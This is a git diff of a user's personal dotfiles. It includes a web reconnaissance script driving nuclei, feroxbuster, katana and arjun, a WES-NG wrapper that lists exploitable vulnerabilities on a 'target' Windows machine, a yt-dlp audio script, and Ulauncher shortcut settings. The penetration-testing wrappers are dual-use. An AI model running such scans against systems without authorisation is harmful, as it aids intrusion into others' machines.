tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 4
|
||||
# Watch output files and show live statistics
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIVE SCAN RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}Nuclei:${NC}'; [ -f nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || echo ' Waiting...'; echo; echo -e '${GREEN}Feroxbuster:${NC}'; [ -f feroxbuster.txt ] && echo \" Found: \$(grep -c '200\\|301\\|302\\|403' feroxbuster.txt 2>/dev/null || echo 0) endpoints\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana:${NC}'; [ -f katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}URLs Discovered:${NC}'; [ -f urls.txt ] && echo \" Total: \$(sort -u urls.txt 2>/dev/null | wc -l) unique URLs\" && echo && echo -e '${CYAN}Latest URLs:${NC}' && tail -5 urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||
|
||||
# Focus back on top-left pane (nuclei)
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux web-recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Web: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} Feroxbuster will auto-stop after 5 minutes"
|
||||
echo -e "${YELLOW}Note:${NC} Arjun waits 10 seconds before starting"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running nuclei...${NC}"
|
||||
command -v nuclei &>/dev/null && nuclei -u "$url" -o nuclei.txt || echo "nuclei not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running feroxbuster (5 min timeout)...${NC}"
|
||||
if command -v feroxbuster &>/dev/null; then
|
||||
timeout 300 feroxbuster -u "$url" -d 3 --smart --silent --force-recursion -o feroxbuster.txt 2>/dev/null || true
|
||||
cat feroxbuster.txt 2>/dev/null | awk '{print $1}' >> urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running katana...${NC}"
|
||||
if command -v katana &>/dev/null; then
|
||||
katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
|
||||
cat katana.txt 2>/dev/null | sort -u >> urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running arjun...${NC}"
|
||||
if command -v arjun &>/dev/null; then
|
||||
arjun -u "$url" -oT arjun_main.txt 2>&1 | tee arjun.log
|
||||
[ -f urls.txt ] && [ -s urls.txt ] && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Web recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: web-recon <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run web reconnaissance
|
||||
run_web_recon "$url"
|
||||
57
scripts/wes
Executable file
57
scripts/wes
Executable file
|
|
@ -0,0 +1,57 @@
|
|||
#!/usr/bin/env bash
|
||||
# Windows Exploit Suggester (WES-NG) wrapper
|
||||
# Analyzes systeminfo.txt and generates vulnerability reports
|
||||
# Requires: systeminfo.txt in current directory, WES-NG cloned to ~/scripts/wesng
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# Colors for output
|
||||
RED='\033[0;31m'
|
||||
YELLOW='\033[0;33m'
|
||||
GREEN='\033[0;32m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
cwd=$(basename "$PWD")
|
||||
|
||||
# Check for systeminfo.txt
|
||||
if [ ! -f systeminfo.txt ]; then
|
||||
echo -e "${RED}Error:${NC} No 'systeminfo.txt' file found in '$PWD'"
|
||||
echo "Usage: Run 'systeminfo > systeminfo.txt' on target Windows machine"
|
||||
echo " Then copy systeminfo.txt to your analysis directory"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check for WES-NG installation
|
||||
if [ ! -d "$HOME/scripts/wesng" ]; then
|
||||
echo -e "${YELLOW}⚠${NC} WES-NG not found at ~/scripts/wesng"
|
||||
echo "Clone it: git clone https://github.com/bitsadmin/wesng ~/scripts/wesng"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Navigate to WES-NG directory
|
||||
cd "$HOME/scripts/wesng"
|
||||
|
||||
echo "Analyzing systeminfo.txt..."
|
||||
|
||||
# Generate reports
|
||||
echo " → All vulnerabilities..."
|
||||
"$HOME/scripts/wesng/wes.py" "$OLDPWD/systeminfo.txt" -c -o "wes-${cwd}-vulns.txt"
|
||||
|
||||
echo " → Critical vulnerabilities only..."
|
||||
"$HOME/scripts/wesng/wes.py" "$OLDPWD/systeminfo.txt" -c -s critical > "wes-${cwd}-critical.txt"
|
||||
|
||||
echo " → Remote Code Execution (RCE) vulnerabilities..."
|
||||
"$HOME/scripts/wesng/wes.py" "$OLDPWD/systeminfo.txt" -c -i "Remote Code Execution" > "wes-${cwd}-rce.txt"
|
||||
|
||||
# Move reports back to analysis directory
|
||||
mv "wes-${cwd}-vulns.txt" "wes-${cwd}-critical.txt" "wes-${cwd}-rce.txt" "$OLDPWD"
|
||||
|
||||
# Return to original directory
|
||||
cd "$OLDPWD"
|
||||
|
||||
echo -e "${GREEN}✓${NC} WES analysis complete"
|
||||
echo ""
|
||||
echo "Reports generated:"
|
||||
echo " - wes-${cwd}-vulns.txt (all vulnerabilities)"
|
||||
echo " - wes-${cwd}-critical.txt (critical only)"
|
||||
echo " - wes-${cwd}-rce.txt (RCE only)"
|
||||
43
scripts/yt-audio
Executable file
43
scripts/yt-audio
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: yt-audio
|
||||
# Description: Download audio-only from YouTube/media sites
|
||||
# Author: Custom (inspired by Evan Hahn's getsong)
|
||||
# Usage: yt-audio <url>
|
||||
# yt-audio <url> --format m4a
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: yt-audio <url> [--format mp3|m4a|opus]" >&2
|
||||
echo "Example: yt-audio 'https://youtube.com/watch?v=xxxxx'" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! command -v yt-dlp &>/dev/null; then
|
||||
echo "Error: yt-dlp not found. Install with: sudo apt install yt-dlp" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
format="${2:-mp3}" # Default to mp3
|
||||
|
||||
# Remove -- prefix if present
|
||||
format="${format#--format }"
|
||||
format="${format#--}"
|
||||
|
||||
echo "🎵 Downloading audio from: $url"
|
||||
echo "📁 Format: $format"
|
||||
echo ""
|
||||
|
||||
# Download audio-only in best quality
|
||||
yt-dlp \
|
||||
--extract-audio \
|
||||
--audio-format "$format" \
|
||||
--audio-quality 0 \
|
||||
--embed-thumbnail \
|
||||
--embed-metadata \
|
||||
--output "%(title)s.%(ext)s" \
|
||||
"$url"
|
||||
|
||||
echo ""
|
||||
echo "✅ Download complete!"
|
||||
|
|
@ -605,6 +605,9 @@ set -g @plugin 'tmux-plugins/tmux-resurrect'
|
|||
set -g @plugin 'tmux-plugins/tmux-continuum'
|
||||
set -g @continuum-restore 'on'
|
||||
|
||||
# Configure which programs resurrect should restore
|
||||
set -g @resurrect-processes 'vi vim nvim emacs man less more tail top htop irssi weechat mutt btop "~claude->claude" "~hx->hx" "~helix->helix"'
|
||||
|
||||
# unbind-key -T prefix 'u'
|
||||
bind-key -T prefix U run-shell /home/e/.tmux/plugins/tpm/bindings/update_plugins
|
||||
|
||||
|
|
|
|||
Binary file not shown.
|
|
@ -13,13 +13,6 @@
|
|||
"last_commit": "7dedd992709fa2297735cddf852404144d4da47c",
|
||||
"last_commit_time": "2023-11-14T16:53:20"
|
||||
},
|
||||
"com.github.brpaz.ulauncher-file-search": {
|
||||
"id": "com.github.brpaz.ulauncher-file-search",
|
||||
"url": "https://github.com/brpaz/ulauncher-file-search",
|
||||
"updated_at": "2025-03-16T13:02:34.961317",
|
||||
"last_commit": "0ea61c2049b27f1ddfa81d1844876f21dd9d6e7b",
|
||||
"last_commit_time": "2020-07-03T13:30:16"
|
||||
},
|
||||
"com.github.mikebarkmin.ulauncher-obsidian": {
|
||||
"id": "com.github.mikebarkmin.ulauncher-obsidian",
|
||||
"url": "https://github.com/mikebarkmin/ulauncher-obsidian",
|
||||
|
|
@ -149,7 +142,7 @@
|
|||
"com.github.tuanpham-dev.ulauncher-better-calculator": {
|
||||
"id": "com.github.tuanpham-dev.ulauncher-better-calculator",
|
||||
"url": "https://github.com/tuanpham-dev/ulauncher-better-calculator",
|
||||
"updated_at": "2025-05-04T00:22:46.353818",
|
||||
"updated_at": "2025-10-17T00:21:49.364925",
|
||||
"last_commit": "48f0592a2a8ac9ec2589a06b562141e1a2d9b25f",
|
||||
"last_commit_time": "2023-04-24T13:55:30"
|
||||
},
|
||||
|
|
|
|||
|
|
@ -7,6 +7,6 @@
|
|||
"render-on-screen": "mouse-pointer-monitor",
|
||||
"show-indicator-icon": true,
|
||||
"show-recent-apps": "0",
|
||||
"terminal-command": "tabby",
|
||||
"terminal-command": "ghostty",
|
||||
"theme-name": "Catppuccin-Mocha-Lavender"
|
||||
}
|
||||
|
|
@ -1,24 +1,14 @@
|
|||
{
|
||||
"3b6e658e-48ed-424e-9a1d-0fff6b9b9856": {
|
||||
"id": "3b6e658e-48ed-424e-9a1d-0fff6b9b9856",
|
||||
"name": "Google Search",
|
||||
"keyword": "g",
|
||||
"cmd": "https://google.com/search?q=%s",
|
||||
"icon": "/usr/share/ulauncher/media/google-search-icon.png",
|
||||
"name": "SearXNG Search",
|
||||
"keyword": "s",
|
||||
"cmd": "http://localhost:8080/search?q=%s",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/edit-find.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151029.2172832
|
||||
},
|
||||
"6ef166ce-911c-447e-9025-8316e681c1e6": {
|
||||
"id": "6ef166ce-911c-447e-9025-8316e681c1e6",
|
||||
"name": "Stack Overflow",
|
||||
"keyword": "so",
|
||||
"cmd": "https://stackoverflow.com/search?q=%s",
|
||||
"icon": "/usr/share/ulauncher/media/stackoverflow-icon.svg",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151029.2172987
|
||||
},
|
||||
"8f7c013e-9ad4-412a-b43a-879ec9c4e6f1": {
|
||||
"id": "8f7c013e-9ad4-412a-b43a-879ec9c4e6f1",
|
||||
"name": "Perplexity",
|
||||
|
|
@ -29,51 +19,11 @@
|
|||
"run_without_argument": false,
|
||||
"added": 1742151030.0001
|
||||
},
|
||||
"a2dcd73c-0d5f-40cb-bf91-bcde88d26f01": {
|
||||
"id": "a2dcd73c-0d5f-40cb-bf91-bcde88d26f01",
|
||||
"name": "YouTube Search",
|
||||
"keyword": "ytube",
|
||||
"cmd": "https://www.youtube.com/results?search_query=%s",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/youtube.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0002
|
||||
},
|
||||
"9cd54c70-3402-4961-b957-cac85f5478cf": {
|
||||
"id": "9cd54c70-3402-4961-b957-cac85f5478cf",
|
||||
"name": "GitHub Search",
|
||||
"keyword": "gh",
|
||||
"cmd": "https://github.com/search?q=%s",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/github.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0003
|
||||
},
|
||||
"3de10f2b-ecb4-4b36-ae89-9dabc070c221": {
|
||||
"id": "3de10f2b-ecb4-4b36-ae89-9dabc070c221",
|
||||
"name": "Amazon Search",
|
||||
"keyword": "a",
|
||||
"cmd": "https://www.amazon.com/s?k=%s",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/amazon.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0004
|
||||
},
|
||||
"6a5c6c4d-0aa7-4bc8-9e09-177987b3b0a1": {
|
||||
"id": "6a5c6c4d-0aa7-4bc8-9e09-177987b3b0a1",
|
||||
"name": "Python Scripts FZF",
|
||||
"keyword": "py",
|
||||
"cmd": "/path/to/run_py.sh",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/python.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1742151030.0005
|
||||
},
|
||||
"d3198654-0c45-47cf-a65a-2b79dff291e3": {
|
||||
"id": "d3198654-0c45-47cf-a65a-2b79dff291e3",
|
||||
"name": "Taskwarrior",
|
||||
"name": "Telos-Week",
|
||||
"keyword": "tw",
|
||||
"cmd": "gnome-terminal -- bash -c 'task; exec bash'",
|
||||
"cmd": "ghostty -e '/home/e/github/numerology/telos-week.ts --profile rob && read \"Press Enter to exit...\"'",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/org.gnome.Terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
|
|
@ -83,10 +33,310 @@
|
|||
"id": "a105b69e-d65f-45d8-a00c-57e0c24b5565",
|
||||
"name": "cht.sh Search",
|
||||
"keyword": "cht",
|
||||
"cmd": "https://cht.sh/%s",
|
||||
"cmd": "ghostty -e bash -c 'query=\"%s\"; query=\"${query// /+}\"; curl -s \"cht.sh/$query\" | less -R'",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/terminal.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0007
|
||||
},
|
||||
"ghostty-quicklink": {
|
||||
"id": "ghostty-quicklink",
|
||||
"name": "Ghostty Terminal",
|
||||
"keyword": "g",
|
||||
"cmd": "ghostty",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0001
|
||||
},
|
||||
"zen-browser-quicklink": {
|
||||
"id": "zen-browser-quicklink",
|
||||
"name": "Zen Browser",
|
||||
"keyword": "z",
|
||||
"cmd": "zen-browser",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0002
|
||||
},
|
||||
"n8n-quicklink": {
|
||||
"id": "n8n-quicklink",
|
||||
"name": "n8n Workflows",
|
||||
"keyword": "n8n",
|
||||
"cmd": "xdg-open https://n8n.djeditech.com",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0004
|
||||
},
|
||||
"lazydocker-quicklink": {
|
||||
"id": "lazydocker-quicklink",
|
||||
"name": "LazyDocker",
|
||||
"keyword": "d",
|
||||
"cmd": "ghostty -e lazydocker",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0005
|
||||
},
|
||||
"protonvpn-quicklink": {
|
||||
"id": "protonvpn-quicklink",
|
||||
"name": "ProtonVPN Connect",
|
||||
"keyword": "vpn",
|
||||
"cmd": "ghostty -e 'protonvpn-cli c US-CO#246'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0003
|
||||
},
|
||||
"btop-quicklink": {
|
||||
"id": "btop-quicklink",
|
||||
"name": "btop System Monitor",
|
||||
"keyword": "btop",
|
||||
"cmd": "ghostty -e btop",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729126000.0001
|
||||
},
|
||||
"htop-quicklink": {
|
||||
"id": "htop-quicklink",
|
||||
"name": "htop System Monitor",
|
||||
"keyword": "htop",
|
||||
"cmd": "ghostty -e htop",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729126000.0002
|
||||
},
|
||||
"github-search-quicklink": {
|
||||
"id": "github-search-quicklink",
|
||||
"name": "GitHub Search",
|
||||
"keyword": "gh",
|
||||
"cmd": "https://github.com/search?q=%s&type=repositories",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1760740000.0001
|
||||
},
|
||||
"lazygit-quicklink": {
|
||||
"id": "lazygit-quicklink",
|
||||
"name": "LazyGit",
|
||||
"keyword": "lg",
|
||||
"cmd": "ghostty -e bash -c 'echo n | lazygit 2>/dev/null || lazygit'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760740000.0002
|
||||
},
|
||||
"navi-quicklink": {
|
||||
"id": "navi-quicklink",
|
||||
"name": "Navi Cheatsheets",
|
||||
"keyword": "navi",
|
||||
"cmd": "ghostty -e navi",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760741000.0001
|
||||
},
|
||||
"yazi-quicklink": {
|
||||
"id": "yazi-quicklink",
|
||||
"name": "Yazi File Manager",
|
||||
"keyword": "yazi",
|
||||
"cmd": "ghostty -e yazi",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/system-file-manager.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760741000.0002
|
||||
},
|
||||
"yazi-short-quicklink": {
|
||||
"id": "yazi-short-quicklink",
|
||||
"name": "Yazi File Manager (short)",
|
||||
"keyword": "yz",
|
||||
"cmd": "ghostty -e yazi",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/system-file-manager.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760741000.0003
|
||||
},
|
||||
"logs-quicklink": {
|
||||
"id": "logs-quicklink",
|
||||
"name": "System Logs Viewer",
|
||||
"keyword": "logs",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== Recent System Logs (journalctl -xe) ===\" && journalctl -xe --no-pager -n 100 | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0001
|
||||
},
|
||||
"ports-quicklink": {
|
||||
"id": "ports-quicklink",
|
||||
"name": "Listening Ports",
|
||||
"keyword": "ports",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== Listening Ports (ss -tuln) ===\" && echo && ss -tuln | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/network-workgroup.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0002
|
||||
},
|
||||
"hugo-deploy-quicklink": {
|
||||
"id": "hugo-deploy-quicklink",
|
||||
"name": "Deploy Website (Hugo)",
|
||||
"keyword": "deploy",
|
||||
"cmd": "ghostty -e zsh -c 'cd ~/github/hugo2 && bash push-deploy.sh; exec zsh'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0003
|
||||
},
|
||||
"gst-quicklink": {
|
||||
"id": "gst-quicklink",
|
||||
"name": "Git Status All Repos",
|
||||
"keyword": "gst",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== Git Status for Common Repos ===\" && for repo in ~/projects/* ~/github/*; do [ -d \"$repo/.git\" ] && echo && echo \"\ud83d\udcc1 $repo\" && git -C \"$repo\" status -s 2>/dev/null; done | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0004
|
||||
},
|
||||
"status-quicklink": {
|
||||
"id": "status-quicklink",
|
||||
"name": "System Status Dashboard",
|
||||
"keyword": "status",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== SYSTEM STATUS DASHBOARD ===\" && echo && echo \"\ud83d\udcca System Load:\" && uptime && echo && echo \"\ud83d\udcbe Memory Usage:\" && free -h && echo && echo \"\ud83d\udcbf Disk Usage:\" && df -h / /home 2>/dev/null && echo && echo \"\ud83c\udf10 Listening Ports:\" && ss -tuln | head -10 && echo \"... (type '\\''ports'\\'' for full list)\" && echo && echo \"\ud83d\udcdd Recent Log Errors (last 10):\" && journalctl -p err -n 10 --no-pager 2>/dev/null | tail -10 && echo && echo \"\ud83d\udc33 Docker Containers:\" && (docker ps --format \"table {{.Names}}\\t{{.Status}}\" 2>/dev/null || echo \"Docker not running or not installed\") && echo && echo \"Press any key to exit...\" && read -r _key'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0001
|
||||
},
|
||||
"kill-quicklink": {
|
||||
"id": "kill-quicklink",
|
||||
"name": "Kill Process (Fuzzy)",
|
||||
"keyword": "kill",
|
||||
"cmd": "ghostty -e bash -c 'ps aux | fzf --header=\"Select process to kill\" --preview=\"echo {}\" --preview-window=down:3:wrap | awk \"{print \\$2}\" | xargs -r kill; exec bash'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/process-stop.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0003
|
||||
},
|
||||
"ulrl-quicklink": {
|
||||
"id": "ulrl-quicklink",
|
||||
"name": "Restart ULauncher",
|
||||
"keyword": "ulrl",
|
||||
"cmd": "systemctl --user restart ulauncher.service",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/view-refresh.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0004
|
||||
},
|
||||
"hugo-server-quicklink": {
|
||||
"id": "hugo-server-quicklink",
|
||||
"name": "Hugo Server",
|
||||
"keyword": "hugo",
|
||||
"cmd": "ghostty -e bash -c 'cd /home/e/github/hugo2/hugoplate && echo \"Starting Hugo server at http://localhost:1313\" && echo \"Press Ctrl+C to stop\" && hugo server --bind 0.0.0.0 --baseURL http://localhost:1313 -D; exec bash'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0005
|
||||
},
|
||||
"youtube-dl-quicklink": {
|
||||
"id": "youtube-dl-quicklink",
|
||||
"name": "Download YouTube Video",
|
||||
"keyword": "dl",
|
||||
"cmd": "ghostty -e bash -c 'cd ~/Videos/Downloaded && yt-dlp \"%s\" && echo && echo \"Download complete! Saved to ~/Videos/Downloaded\" && echo \"Press any key to exit...\" && read -r _key; exec bash'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/folder-download.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1760743000.0006
|
||||
},
|
||||
"obsidian-search-quicklink": {
|
||||
"id": "obsidian-search-quicklink",
|
||||
"name": "Obsidian Fuzzy Search",
|
||||
"keyword": "o",
|
||||
"cmd": "ghostty -e zsh -c 'result=$(rg -l \"%s\" ~/Documents/Obsidian-Fabric ~/Documents/Kamrui_Obsidian --type md 2>/dev/null | fzf --header=\"Select note to open\" --preview=\"bat --color=always --style=numbers {}\"); [ -n \"$result\" ] && xdg-open \"$result\"'",
|
||||
"icon": "/usr/share/icons/hicolor/scalable/apps/obsidian-icon.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1760744000.0002
|
||||
},
|
||||
"git-diff-quicklink": {
|
||||
"id": "git-diff-quicklink",
|
||||
"name": "Git Diff Viewer",
|
||||
"keyword": "diff",
|
||||
"cmd": "ghostty -e zsh -c 'git diff --color=always | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0003
|
||||
},
|
||||
"clipboard-quicklink": {
|
||||
"id": "clipboard-quicklink",
|
||||
"name": "Clipboard Editor",
|
||||
"keyword": "clip",
|
||||
"cmd": "ghostty -e zsh -c 'tmpfile=$(mktemp /tmp/clipboard.XXXXXX); xclip -o -selection clipboard > \"$tmpfile\"; hx \"$tmpfile\"; cat \"$tmpfile\" | xclip -selection clipboard; rm \"$tmpfile\"'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/edit-paste.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0004
|
||||
},
|
||||
"wifi-quicklink": {
|
||||
"id": "wifi-quicklink",
|
||||
"name": "WiFi Network Manager",
|
||||
"keyword": "wifi",
|
||||
"cmd": "ghostty -e nmtui",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/network-wireless.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0005
|
||||
},
|
||||
"bluetooth-quicklink": {
|
||||
"id": "bluetooth-quicklink",
|
||||
"name": "Bluetooth Manager",
|
||||
"keyword": "bt",
|
||||
"cmd": "ghostty -e bluetoothctl",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/bluetooth.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0006
|
||||
},
|
||||
"weather-quicklink": {
|
||||
"id": "weather-quicklink",
|
||||
"name": "Weather Report",
|
||||
"keyword": "weather",
|
||||
"cmd": "ghostty -e /home/e/.claude/commands/weather-wrapper.sh",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/weather-clear.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0007
|
||||
},
|
||||
"d2433c00-43fd-424c-8e82-6f3d132708f2": {
|
||||
"id": "d2433c00-43fd-424c-8e82-6f3d132708f2",
|
||||
"name": "weather-test",
|
||||
"keyword": "w",
|
||||
"cmd": "ghostty -e '/home/e/.bun/bin/bun /home/e/.claude/commands/weather-report.md && read \"Press Enter to exit...\"'",
|
||||
"icon": null,
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760845029.8644536
|
||||
},
|
||||
"17ff09ab-cd33-4900-9626-e18f81647d8f": {
|
||||
"id": "17ff09ab-cd33-4900-9626-e18f81647d8f",
|
||||
"name": "Progress Bar",
|
||||
"keyword": "pb",
|
||||
"cmd": "ghostty -e '/home/e/.bun/bin/bun /home/e/.claude/commands/progress.md && read \"Press Enter to exit...\"'",
|
||||
"icon": null,
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1761198481.905308
|
||||
},
|
||||
"57fbe6b9-7da4-4e31-8d94-7128d4a071e4": {
|
||||
"id": "57fbe6b9-7da4-4e31-8d94-7128d4a071e4",
|
||||
"name": "SimpleX",
|
||||
"keyword": "simplex",
|
||||
"cmd": "ghostty -e 'nohup simplex &'",
|
||||
"icon": null,
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1762414155.4334407
|
||||
}
|
||||
}
|
||||
325
zsh/.aliases
325
zsh/.aliases
|
|
@ -1,7 +1,8 @@
|
|||
